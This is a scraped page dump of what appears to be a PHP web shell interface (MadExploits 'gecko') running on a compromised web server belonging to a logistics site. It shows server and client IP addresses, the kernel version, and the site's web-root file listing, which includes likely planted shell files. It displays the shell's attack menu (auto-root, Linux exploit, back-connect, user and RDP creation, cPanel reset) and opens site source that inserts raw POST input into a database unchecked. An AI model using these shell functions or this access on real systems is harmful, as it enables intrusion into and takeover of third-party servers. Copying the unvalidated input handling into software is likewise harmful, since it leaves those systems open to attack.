Linux ip-172-31-29-64 6.8.0-1050-aws #53~22.04.1-Ubuntu SMP Fri Mar 13 21:34:27 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
: 172.31.29.64 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
5.6.40-77+ubuntu22.04.1+deb.sury.org+1
ubuntu
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
maalgaadi /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxrwxr-x
14322
[ DIR ]
drwxrwxr-x
291222
[ DIR ]
drwxrwxr-x
APK
[ DIR ]
drwxrwxr-x
Customer_App
[ DIR ]
drwxrwxr-x
Driver_App
[ DIR ]
drwxrwxr-x
Driver_OnBoarding_App
[ DIR ]
drwxrwxr-x
app
[ DIR ]
drwxrwxr-x
assets
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
page_fragment
[ DIR ]
drwxrwxr-x
ssl
[ DIR ]
drwxrwxr-x
.htaccess
368
B
-rw-rw-r--
Driver_Icon.jpeg
1.2
KB
-rw-rw-r--
GoogleSpreadSheets.php
918
B
-rw-rw-r--
New file
8.11
KB
-rw-rw-r--
_demoNj.php
4.24
KB
-rw-rw-r--
_demo_AK.php
818
B
-rw-rw-r--
_query_run.php
776
B
-rw-rw-r--
api_validate.php
2.36
KB
-rw-rw-r--
attach-vehicle.html
11.27
KB
-rw-rw-r--
blog.html
12.67
KB
-rw-rw-r--
call.png
860
B
-rw-rw-r--
careers.html
15.19
KB
-rw-rw-r--
currentDriverData.php
1.31
KB
-rw-rw-r--
driver_tracking_detail.php
15.8
KB
-rw-rw-r--
events.html
15.58
KB
-rw-rw-r--
gecko.php
172.83
KB
-rw-rw-r--
getData.php
8.52
KB
-rw-rw-r--
google99ae0657ac3e3c1d.html
53
B
-rw-rw-r--
googleb09350006d774800.html
53
B
-rw-rw-r--
ids.php
178
B
-rw-rw-r--
index.php
52.42
KB
-rw-rw-r--
index2.php
50.04
KB
-rw-rw-r--
info.php
27
B
-rw-rw-r--
live_tracking.php
17.36
KB
-rw-rw-r--
marker-track.png
1.26
KB
-rw-rw-r--
mass.php
133.38
KB
-rw-rw-r--
order-tracking_operation.php
1.82
KB
-rw-rw-r--
privacy-policy.html
18.47
KB
-rw-rw-r--
robots.txt
27
B
-rw-rw-r--
sitemap.xml
670
B
-rw-rw-r--
terms-and-condition.html
55.15
KB
-rw-rw-r--
whatsapp.png
1.71
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : GoogleSpreadSheets.php
<?php require_once './page_fragment/define-live.php'; include ('./page_fragment/dbConnect.php'); include ('./page_fragment/dbGeneral.php'); include ('./page_fragment/njGeneral.php'); $dbConObj = new dbConnect(); $dbComObj = new dbGeneral(); $conn = $dbConObj->dbConnect(); $operation = ""; if (isset($_POST['todo'])) { $operation = $_POST['todo']; unset($_POST['todo']); } elseif (isset($_GET['todo'])) { $operation = $_GET['todo']; unset($_GET['todo']); } print_r($operation); if($operation == 'saveWhatsupappNumber'){ $sendData['mg_id'] = $_POST['mg_id']; $sendData['whatsapp_number'] = $_POST['whatsapp_number']; $sendData['vehicle_category'] = $_POST['vehicle_category']; $sendData['status'] = $_POST['status']; $sendData['Timestamp'] = $_POST['Timestamp']; $dbComObj->addData($conn,"App_Form_Data",$sendData); $array['success'] = "ok"; return $array; } ?>
Close